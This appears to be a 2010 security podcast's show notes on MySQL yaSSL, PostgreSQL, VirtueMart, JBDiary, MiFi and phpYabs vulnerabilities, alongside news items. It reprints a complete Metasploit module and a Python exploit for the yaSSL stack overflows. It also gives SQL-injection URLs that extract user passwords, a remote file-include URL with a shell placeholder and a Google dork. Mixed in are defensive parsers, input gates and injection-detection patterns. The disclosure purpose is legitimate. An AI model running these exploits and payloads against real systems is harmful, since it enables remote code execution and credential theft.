InfoSec Podcast Episode 56 for January 28, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information-security-related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
FORENSICS-606: Drive and Data Recovery Forensics (Canceled)
Louisville OWASP Chapter – Fourth Meeting, Friday January 29th, 2010
Please Note: RSVP Required! The meeting location this quarter has a capacity of 40 persons. Please send your RSVP as soon as possible to ensure a seat and lunch. We apologize for any inconvenience this may cause and are seeking a larger venue for future meetings.
To RSVP: Just send a reply to brian.r.blankenship@gmail.com and indicate how many are coming.
Date/Time: January 29th, 11:30 – 1:00PM
Location: MetroSafe Building, 410 S. Fifth Street. (there is a parking lot across the street, and a parking garage 1/2 block away).
Lunch is being provided by Imperva and Accuvant.
Speaker: Rafal Los will be discussing Flash and Web 2.0 security (see bio below)
“Rafal Los, Security Specialist with Hewlett-Packard’s Application Security Center (ASC), is an industry veteran who has worked in a variety of security positions, from consultant to Information Security Officer in the Fortune 100, within some of the most demanding business environments. Rafal’s unique blend of technical expertise and business knowledge enables him to teach audiences about security techniques, programs and processes that they can both understand strategically and realistically apply. He has extensive experience in security testing, risk analysis and management, penetration testing, architecture and policy. Previous successes include building and implementing a successful web application security program for one of the largest and most diverse companies in the world.”
Vulnerabilities of Interest:
- yaSSL is subject to multiple remote buffer-overflow vulnerabilities. Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of applications using the library. Failed attacks will cause denial-of-service conditions. yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected. Proof-of-concept and exploit code are available:
##
# $Id: mysql_yassl_hello.rb 8242 2010-01-26 20:12:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MySQL yaSSL SSL Hello Message Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack overflow in the yaSSL (1.7.5 and earlier)
        implementation bundled with MySQL <= 6.0. By sending a specially crafted
        Hello packet, an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8242 $',
      'References'     =>
        [
          [ 'CVE', '2008-0226' ],
          [ 'OSVDB', '41195' ],
          [ 'BID', '27140' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 600,
          'BadChars'        => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],
          [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 4 2008'))

    register_options([ Opt::RPORT(3306) ], self)
  end

  def exploit
    connect

    # read the MySQL server greeting
    sock.get_once

    # MySQL packet header: payload length 0x20, sequence number 1
    req_uno = [0x01000020].pack('V')

    # SSL-request packet body: client flags (CLIENT_SSL set), max packet size,
    # charset and 23 reserved bytes, followed by the crafted record
    req_dos  = [0x00008daa].pack('V') + [0x40000000].pack('V')
    req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')
    req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
    req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
    req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')
    req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length)
    req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V')
    req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024)

    print_status("Trying target #{target.name}...")

    sock.put(req_uno)
    sock.put(req_dos)

    handler
    disconnect
  end
end
- MySQL compiled with yaSSL is subject to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.
#!/usr/bin/env python
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""
Usage: mysql_overflo1.py localhost

MySQL yassl cert parsing stack overflow
Debug session on 5.5.0-m2

suse11:~ # gdb -q
(gdb) att 5542
Attaching to process 5542
Reading symbols from /var/mysql/libexec/mysqld...done.
...
0xffffe430 in __kernel_vsyscall ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6bbab90 (LWP 5545)]
0x41424344 in ?? ()
(gdb)
"""

import os
import getopt
import sys
import socket
import time
import telnetlib
import struct
import base64
import random


class theexploit:
    def __init__(self, host):
        self.host = host
        self.port = 3306

    def gettcpsock(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        return sock

    def int2berlen(self, i):
        # DER length encoding: short form up to 127, long form (0x80|n) + n bytes above that
        e = self.int2ber(i, signed=0)
        if i <= 127:
            return e
        else:
            l = len(e)
            return chr(0x80 | l) + e

    def int2ber(self, i, signed=1):
        # minimal big-endian byte string for the integer i
        encoded = ""
        while ((signed and (i > 127 or i < -128))
               or (not signed and (i > 255))):
            encoded = chr(i % 256) + encoded
            i = i >> 8
        encoded = chr(i % 256) + encoded
        return encoded

    def big_endian_24(self, length):
        # 3-byte big-endian length field as used in TLS handshake messages
        l1 = (length & 0xff0000) >> 16
        l2 = (length & 0xff00) >> 8
        l3 = length & 0xff
        size = chr(l1) + chr(l2) + chr(l3)
        return size

    def attack_mysql(self):
        sock = self.gettcpsock()
        sock.connect((self.host, self.port))
        #sock.set_timeout(30.0)

        print "press any key"
        sys.stdin.readline()

        # server greeting
        s = sock.recv(8000)
        print s

        # MySQL SSL-request packet followed by a TLS ClientHello record
        s = "\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00"
        s += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        s += "\x00\x00\x00\x00"
        s += "\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1"
        s += "\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5"
        s += "\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39"
        s += "\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f"
        s += "\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12"
        s += "\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06"
        s += "\x00\x03\x02\x01\x00"
        sock.sendall(s)
        print "Sent SSL_CLIENT_HELLO"

        sock.sendall(self.make_overflow())
        print "Sent SSL_CLIENT_CERTIFICATE"
        sock.close()

    def run(self):
        self.attack_mysql()
        return 0

    def make_overflow(self):
        retaddr = 0x41424344
        cn = ""
        cn += "\x00" * 1062
        cn += struct.pack("<L", retaddr) * 6
        #cn += "\x40" * 100
        #cn += "\xcc" * 100
        #cn += "\x40" * 100

        cert = "\x2a\x86\x00\x84" + struct.pack(">L", len(cn)) + cn
        cert = "\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02" + cert
        cert = "\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" + cert
        cert = "\x30" + self.int2berlen(len(cert)) + cert
        cert = "\x30" + self.int2berlen(len(cert)) + cert

        # TLS Certificate handshake message wrapped in a TLS record
        cert1 = self.big_endian_24(len(cert)) + cert
        certs = self.big_endian_24(len(cert1)) + cert1
        handshake = "\x0b" + self.big_endian_24(len(certs)) + certs
        msg = "\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake
        return msg


if __name__ == "__main__":
    app = theexploit(sys.argv[1])
    app.run()

- PostgreSQL is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application. PostgreSQL 8.0.23 is vulnerable; other versions may also be affected. Proof of concept is available: testdb=# select substring(B'10101010101010101010101010101010101010101010101',33,-15);
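Both yaSSL items above come down to the same defect: a length field taken from the wire (the 24-bit TLS handshake lengths, the DER lengths inside the certificate) is used to copy data without first checking it against the container that holds it or the buffer it is copied into. The following Python 3 parser is an added example, not code from the podcast or from the yaSSL or Metasploit projects; it shows the checks a receiver needs. All names in it are assumed, and CERT_BUFFER_SIZE is a constructed limit standing in for whatever fixed buffer a receiver actually uses.

```python
import struct

MAX_TLS_RECORD = 16384       # RFC 5246: a plaintext fragment is at most 2^14 bytes
HANDSHAKE_CERTIFICATE = 0x0b
CERT_BUFFER_SIZE = 4096      # constructed: size of the fixed buffer a receiver copies a cert into


def read_u24(buf, off, end):
    """Read a 3-byte big-endian length that must lie wholly inside buf[off:end]."""
    if off + 3 > end:
        raise ValueError("24-bit length at offset %d runs past its container" % off)
    return (buf[off] << 16) | (buf[off + 1] << 8) | buf[off + 2]


def read_der_tlv(buf, off, end):
    """Read one DER tag/length/value inside buf[off:end]; return (tag, value, next_off).
    A declared length that would reach outside the container is rejected before use."""
    if off + 2 > end:
        raise ValueError("DER header at offset %d runs past its container" % off)
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first < 0x80:                      # short form: the byte is the length
        length = first
    else:                                 # long form: low bits give the byte count
        nbytes = first & 0x7f
        if nbytes == 0 or nbytes > 4 or off + nbytes > end:
            raise ValueError("DER long-form length is malformed or truncated")
        length = int.from_bytes(buf[off:off + nbytes], "big")
        off += nbytes
    if off + length > end:
        raise ValueError("DER length %d exceeds its container" % length)
    return tag, buf[off:off + length], off + length


def parse_tls_record(data):
    """Split one TLS record off the front of data; return (content_type, body)."""
    if len(data) < 5:
        raise ValueError("record header truncated")
    content_type, _major, _minor, length = struct.unpack(">BBBH", data[:5])
    if length > MAX_TLS_RECORD:
        raise ValueError("record length %d above TLS maximum" % length)
    if 5 + length > len(data):
        raise ValueError("record length %d exceeds bytes received" % length)
    return content_type, data[5:5 + length]


def parse_certificate_message(body):
    """Parse a Certificate handshake message; return the list of DER certificates.
    Every nested length is checked against its container and against the receive
    buffer before anything is copied, which is the check a vulnerable parser omits."""
    end = len(body)
    if end < 4 or body[0] != HANDSHAKE_CERTIFICATE:
        raise ValueError("not a Certificate handshake message")
    hs_len = read_u24(body, 1, end)
    if 4 + hs_len != end:
        raise ValueError("handshake length %d disagrees with record body" % hs_len)
    list_len = read_u24(body, 4, end)
    if 7 + list_len != end:
        raise ValueError("certificate list length %d disagrees with handshake" % list_len)
    certs, off = [], 7
    while off < end:
        cert_len = read_u24(body, off, end)
        off += 3
        if off + cert_len > end:
            raise ValueError("certificate length %d overruns the list" % cert_len)
        if cert_len > CERT_BUFFER_SIZE:
            raise ValueError("certificate length %d exceeds the receive buffer" % cert_len)
        der = body[off:off + cert_len]
        tag, _value, _next = read_der_tlv(der, 0, len(der))   # outer SEQUENCE must fit its blob
        if tag != 0x30:
            raise ValueError("certificate is not a DER SEQUENCE")
        certs.append(der)
        off += cert_len
    return certs


def u24(n):
    return n.to_bytes(3, "big")


def build_certificate_record(certs):
    """Constructed sample input: DER blobs wrapped in a Certificate handshake and a TLS record."""
    cert_list = b"".join(u24(len(c)) + c for c in certs)
    handshake = (bytes([HANDSHAKE_CERTIFICATE]) + u24(len(cert_list) + 3)
                 + u24(len(cert_list)) + cert_list)
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


# constructed stand-in for a certificate: a minimal DER SEQUENCE holding one INTEGER
SAMPLE_CERT = b"\x30\x03\x02\x01\x05"


def check(data):
    """Return the number of certificates accepted, or the reason the data was rejected."""
    try:
        _ctype, body = parse_tls_record(data)
        return len(parse_certificate_message(body))
    except ValueError as exc:
        return str(exc)
```

With a well-formed record check() returns 1; overwriting the inner certificate length with 0x0fffff, or the record length with 0x7fff, makes it return the rejection reason instead of reading past the data. The point is that every length is compared with the bytes actually present and with the destination buffer before a single byte is copied.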
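The PostgreSQL proof of concept above passes a negative length to substring() on a bit string. The Python below is an added illustration, not PostgreSQL's code: bit_substring() applies the rule PostgreSQL already uses for text substrings (a negative length is an error) before doing any range arithmetic, while unchecked_copy_length() models what the same clamping yields without that check when the resulting count is handed to a C copy routine as an unsigned 32-bit value. SAMPLE_BITS is a constructed 47-bit value modelled on the page's proof of concept.

```python
# constructed value modelled on the page's proof of concept: a 47-bit string
SAMPLE_BITS = "10" * 23 + "1"


def bit_substring(bits, start, length=None):
    """substring(bits FROM start FOR length) with SQL's 1-based, inclusive semantics.
    A negative length is refused up front and the range arithmetic uses unbounded
    Python ints, so the result can only ever be a slice inside the input."""
    if length is not None and length < 0:
        raise ValueError("negative substring length not allowed")
    n = len(bits)
    s1 = max(start, 1)                                      # clamp the start into the string
    end = n + 1 if length is None else start + length       # exclusive end position
    e1 = min(end, n + 1)                                    # clamp the end into the string
    if e1 <= s1:
        return ""
    return bits[s1 - 1:e1 - 1]


def unchecked_copy_length(n, start, length):
    """Model of the defect: the same clamping with no negative-length check, returning
    the byte count a C implementation would pass to a copy as an unsigned 32-bit value."""
    s1 = max(start, 1)
    e1 = min(start + length, n + 1)
    return (e1 - s1) & 0xffffffff
```

For the page's input (start 33, length -15 on 47 bits) the clamped end lands before the clamped start, and the unchecked model turns that -15 into a copy length of 4294967281; the checked version refuses the call instead.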
- VirtueMart is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart
http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart
http://www.sample.com/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version
- MiFi 2352 is subject to an information-disclosure vulnerability that may expose sensitive information. Successful exploits will allow authenticated attackers to obtain passwords, which may aid in further attacks. MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also be affected. Example URLs:
http://www.sample.com/config.xml.sav
http://www.sample.com/config.xml.save
- e107 is subject to an unspecified remote vulnerability. Very little is known about this issue. Versions prior to e107 0.7.17 are vulnerable. This issue was exploited in an attack against the vendor’s website. Currently we are not aware of any publicly available exploits.
- phpYabs is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. phpYabs 0.1.2 is vulnerable; other versions may also be affected. Example URL:
http://www.sample.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]
Google dork: inurl:phpyabs/moduli/libri/index.php
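The MiFi and phpYabs items above are both cases of a web front end serving or including something it should never have reached from a request: a leftover config.xml.sav backup, and a file chosen by the Azione parameter. The Python below is an added example, not code from either product, of the two request-side gates a defender puts in front of such handlers: an allow-list that maps the parameter to a fixed file (so the value never becomes a path), and a suffix check that refuses backup and editor artifacts. MODULE_DIR, ALLOWED_MODULES and the suffix list are constructed for the example.

```python
import posixpath
import re

# constructed values for this example; not phpYabs's or the MiFi's real layout
MODULE_DIR = "/var/www/phpyabs/moduli/libri"
ALLOWED_MODULES = {"elenco": "elenco.php", "dettaglio": "dettaglio.php"}
BACKUP_SUFFIX = re.compile(r"(\.(sav|save|bak|old|orig|swp|tmp)|~)$", re.IGNORECASE)


def resolve_module(azione):
    """Map the 'Azione' request parameter to a file through an allow-list.
    The parameter only selects a key; a URL, a path or anything not in the
    table is refused, so it can never reach include()."""
    if azione not in ALLOWED_MODULES:
        raise ValueError("unknown module: %r" % azione)
    return posixpath.join(MODULE_DIR, ALLOWED_MODULES[azione])


def is_backup_artifact(request_path):
    """True when the request targets a backup or editor copy (config.xml.sav, foo.bak, foo~).
    The path is normalised first so '/config.xml.sav/.' cannot slip past the suffix test."""
    path_only = request_path.split("?", 1)[0]
    normalized = posixpath.normpath("/" + path_only.lstrip("/"))
    return bool(BACKUP_SUFFIX.search(normalized))


def gate_request(request_path, azione=None):
    """Decide whether a request may proceed; returns 'allow' or a rejection reason."""
    if is_backup_artifact(request_path):
        return "deny: backup artifact"
    if azione is not None:
        try:
            resolve_module(azione)
        except ValueError as exc:
            return "deny: %s" % exc
    return "allow"
```

The suffix check belongs in the web server configuration as well as in code, and the real fix for the MiFi case is not to leave the backup in the document root at all; the gate is a safety net for the next time one is left behind.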
- The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01
http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01
http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23
http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23
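The VirtueMart and JBDiary items above are the same bug class: a request parameter (order_status_id, newyear, newmonth) is spliced into SQL text. The Python below is an added example, not code from either component, showing the defect beside its fix and a small detector that flags request URLs like the ones listed. The order_status table and its rows are constructed for the example; the URLs in the test are the page's own.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

SQLI_PATTERNS = [
    re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE),   # UNION-based extraction
    re.compile(r"@@version|database\(\)", re.IGNORECASE),  # server fingerprinting expressions
    re.compile(r"'\s*(and|or)\b", re.IGNORECASE),          # quote break followed by a boolean
]


def suspicious_params(url):
    """Names of query parameters whose decoded value matches an injection pattern.
    parse_qs already undoes %27 and '+' encoding, so the patterns see plain text."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [name for name, values in query.items()
            if any(p.search(v) for p in SQLI_PATTERNS for v in values)]


def make_db():
    """Constructed in-memory table standing in for the order-status table the URLs query."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE order_status (order_status_id INTEGER, order_status_name TEXT);"
        "INSERT INTO order_status VALUES (1, 'Pending'), (2, 'Shipped');"
    )
    return db


def status_names_vulnerable(db, order_status_id):
    """The defect: the request value is spliced into the SQL text."""
    sql = "SELECT order_status_name FROM order_status WHERE order_status_id = '%s'" % order_status_id
    return sorted(row[0] for row in db.execute(sql))


def status_names_safe(db, order_status_id):
    """The fix: validate the type, then bind the value as a query parameter."""
    try:
        oid = int(order_status_id)
    except (TypeError, ValueError):
        raise ValueError("order_status_id must be an integer")
    rows = db.execute(
        "SELECT order_status_name FROM order_status WHERE order_status_id = ?", (oid,))
    return sorted(row[0] for row in rows)
```

With the value 1' OR '1'='1 the vulnerable query returns every row while the parameterised one refuses the value before it reaches the database. The detector is a triage aid for access logs, not a substitute for binding parameters: it only knows the patterns in the URLs above.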
News Items of Interest:
News item 1: http://www.businesswire.com/portal/site/topix/?ndmViewId=news_view&newsId=20100127005098&newsLang=en
An IT security expert and blogger claims to have successfully intercepted and compromised phone calls made using 12 commercially available mobile voice encryption products. PhoneCrypt from SecurStar was one of only three solutions that successfully blocked the attacks that were made using a simple wiretapping Trojan.
“Like most security breaches, Notrax went for the weakest link; he did not attempt to crack the encryption itself, but used simple wiretapping techniques”
Using a readily available wiretapping utility costing as little as $100, as well as his own ‘homemade’ Trojan, the blogger – aka Notrax – was able to bypass the encryption and eavesdrop by capturing conversations from the microphone and speaker in real time. By suppressing any rings, notifications or call logs, these attacks go completely undetected. And while Trojans can be installed manually by someone with access to the phone, they could equally be delivered via email, SMS or a mobile application.
Notrax describes his tests extensively at www.infosecurityguard.com with links to Youtube videos.
News item 2: http://www.newsfactor.com/story.xhtml?story_id=12200DUI6NKA&full_skip=1
In a move that could invigorate weak sales of Google’s Nexus One smartphone, Wal-Mart, the world’s largest retailer, appears ready to start selling the device. According to one online report, the cost could be as low as $99 — much lower than the subsidized $179 price from T-Mobile with a two-year plan.
News item 3: http://www.internetnews.com/security/article.php/3860871
Data breach incidents cost companies an average of $6.75 million each time, according to a new study released by security researcher The Ponemon Institute and PGP Corp., an e-mail and data encryption security software developer.
And while the study found that the total number of reported data breaches declined from 657 incidents in 2008 to 498 last year, the average cost inched up from $202 to $204 per customer record.
The firms’ joint U.S. Cost of Data Breach Study chronicles a wide range of cost factors, including the outlays for detection, escalation, notification and response along with legal, investigative and administrative expenses, customer defections, opportunity loss and reputation management.
The $6.75 million cost per incident was slightly higher than the $6.65 million enterprise clients shelled out in 2008. Those figures include the costs associated with customer support such as information hotlines and credit monitoring subscriptions.
Technical Segment: http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php